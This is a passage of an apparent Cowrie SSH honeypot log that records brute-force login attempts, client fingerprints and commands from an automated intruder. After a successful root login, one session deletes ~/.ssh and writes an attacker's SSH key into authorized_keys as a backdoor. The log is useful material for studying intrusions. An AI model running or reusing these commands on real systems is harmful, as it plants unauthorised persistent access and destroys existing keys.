{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:12:28.261611Z","src_ip":"212.227.235.229","session":"646a7964af9f"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-28T16:12:28.370462Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-28T16:12:28.372685Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.command.input","input":"/bin/busybox VYDBV","message":"CMD: /bin/busybox VYDBV","sensor":"my-vps","timestamp":"2025-08-28T16:12:28.498979Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-28T16:12:28.501242Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-28T16:12:28.502635Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-28T16:12:28.503382Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/13f2aa676610b1c83a062bb7d584b2516c4b7a569746a605cbc40997d8788839","size":3550,"shasum":"13f2aa676610b1c83a062bb7d584b2516c4b7a569746a605cbc40997d8788839","duplicate":false,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/13f2aa676610b1c83a062bb7d584b2516c4b7a569746a605cbc40997d8788839 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:12:28.505158Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.session.closed","duration":1.2191920280456543,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:12:28.509902Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58178,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dcec2c62ecc","protocol":"ssh","message":"New connection: 212.227.235.229:58178 (1.2.3.4:22) [session: 0dcec2c62ecc]","sensor":"my-vps","timestamp":"2025-08-28T16:12:59.757829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:12:59.758528Z","src_ip":"212.227.235.229","session":"0dcec2c62ecc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:12:59.975527Z","src_ip":"212.227.235.229","session":"0dcec2c62ecc"}
{"eventid":"cowrie.login.failed","username":"userone","password":"userone","message":"login attempt [userone/userone] failed","sensor":"my-vps","timestamp":"2025-08-28T16:13:00.885956Z","src_ip":"212.227.235.229","session":"0dcec2c62ecc"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:13:02.105580Z","src_ip":"212.227.235.229","session":"0dcec2c62ecc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59044,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cdad813679c","protocol":"ssh","message":"New connection: 212.227.235.229:59044 (1.2.3.4:22) [session: 5cdad813679c]","sensor":"my-vps","timestamp":"2025-08-28T16:13:09.421118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:13:09.422491Z","src_ip":"212.227.235.229","session":"5cdad813679c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:13:09.745373Z","src_ip":"212.227.235.229","session":"5cdad813679c"}
{"eventid":"cowrie.login.failed","username":"bot2","password":"bot2","message":"login attempt [bot2/bot2] failed","sensor":"my-vps","timestamp":"2025-08-28T16:13:11.083787Z","src_ip":"212.227.235.229","session":"5cdad813679c"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:13:12.409445Z","src_ip":"212.227.235.229","session":"5cdad813679c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34492,"dst_ip":"1.2.3.4","dst_port":22,"session":"e349fc811064","protocol":"ssh","message":"New connection: 212.227.235.229:34492 (1.2.3.4:22) [session: e349fc811064]","sensor":"my-vps","timestamp":"2025-08-28T16:13:36.091263Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:13:36.092330Z","src_ip":"212.227.235.229","session":"e349fc811064"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:13:36.334755Z","src_ip":"212.227.235.229","session":"e349fc811064"}
{"eventid":"cowrie.login.success","username":"root","password":"vagrant","message":"login attempt [root/vagrant] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:13:37.341903Z","src_ip":"212.227.235.229","session":"e349fc811064"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:13:37.845898Z","src_ip":"212.227.235.229","session":"e349fc811064"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:13:37.846596Z","src_ip":"212.227.235.229","session":"e349fc811064"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:13:37.847590Z","src_ip":"212.227.235.229","session":"e349fc811064"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:13:38.090862Z","src_ip":"212.227.235.229","session":"e349fc811064"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:13:38.635672Z","src_ip":"212.227.235.229","session":"e349fc811064"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:13:38.636374Z","src_ip":"212.227.235.229","session":"e349fc811064"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:13:38.880368Z","src_ip":"212.227.235.229","session":"e349fc811064"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:13:38.881291Z","src_ip":"212.227.235.229","session":"e349fc811064"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35526,"dst_ip":"1.2.3.4","dst_port":22,"session":"235755ff2f2f","protocol":"ssh","message":"New connection: 212.227.235.229:35526 (1.2.3.4:22) [session: 235755ff2f2f]","sensor":"my-vps","timestamp":"2025-08-28T16:13:39.110142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:13:39.111236Z","src_ip":"212.227.235.229","session":"235755ff2f2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:13:39.347636Z","src_ip":"212.227.235.229","session":"235755ff2f2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58910,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cedecc8a0bc","protocol":"ssh","message":"New connection: 212.227.235.229:58910 (1.2.3.4:22) [session: 2cedecc8a0bc]","sensor":"my-vps","timestamp":"2025-08-28T16:13:39.419105Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:13:40.335161Z","src_ip":"212.227.235.229","session":"235755ff2f2f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-28T16:13:40.551491Z","src_ip":"212.227.235.229","session":"2cedecc8a0bc"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-28T16:13:41.512553Z","src_ip":"212.227.235.229","session":"2cedecc8a0bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36700,"dst_ip":"1.2.3.4","dst_port":22,"session":"96e5580b07a9","protocol":"ssh","message":"New connection: 212.227.235.229:36700 (1.2.3.4:22) [session: 96e5580b07a9]","sensor":"my-vps","timestamp":"2025-08-28T16:13:43.337064Z"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:13:43.338093Z","src_ip":"212.227.235.229","session":"235755ff2f2f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:13:43.338620Z","src_ip":"212.227.235.229","session":"96e5580b07a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:13:43.563828Z","src_ip":"212.227.235.229","session":"96e5580b07a9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51404,"dst_ip":"1.2.3.4","dst_port":22,"session":"bca26f226cde","protocol":"ssh","message":"New connection: 217.72.205.35:51404 (1.2.3.4:22) [session: bca26f226cde]","sensor":"my-vps","timestamp":"2025-08-28T16:13:43.994237Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:13:43.995572Z","src_ip":"217.72.205.35","session":"bca26f226cde"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:13:44.464169Z","src_ip":"212.227.235.229","session":"96e5580b07a9"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:13:44.690976Z","src_ip":"212.227.235.229","session":"96e5580b07a9"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:13:44.707167Z","src_ip":"212.227.235.229","session":"e349fc811064"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:13:48.311871Z","src_ip":"212.227.235.229","session":"2cedecc8a0bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53884,"dst_ip":"1.2.3.4","dst_port":22,"session":"855a1eca5134","protocol":"ssh","message":"New connection: 212.227.235.229:53884 (1.2.3.4:22) [session: 855a1eca5134]","sensor":"my-vps","timestamp":"2025-08-28T16:14:08.564639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:14:08.565672Z","src_ip":"212.227.235.229","session":"855a1eca5134"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:14:08.773142Z","src_ip":"212.227.235.229","session":"855a1eca5134"}
{"eventid":"cowrie.login.failed","username":"student","password":"P@ssw0rd","message":"login attempt [student/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-28T16:14:09.641776Z","src_ip":"212.227.235.229","session":"855a1eca5134"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:14:10.851792Z","src_ip":"212.227.235.229","session":"855a1eca5134"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56520,"dst_ip":"1.2.3.4","dst_port":22,"session":"f077ff38c570","protocol":"ssh","message":"New connection: 212.227.235.229:56520 (1.2.3.4:22) [session: f077ff38c570]","sensor":"my-vps","timestamp":"2025-08-28T16:14:29.597926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:14:29.598860Z","src_ip":"212.227.235.229","session":"f077ff38c570"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","a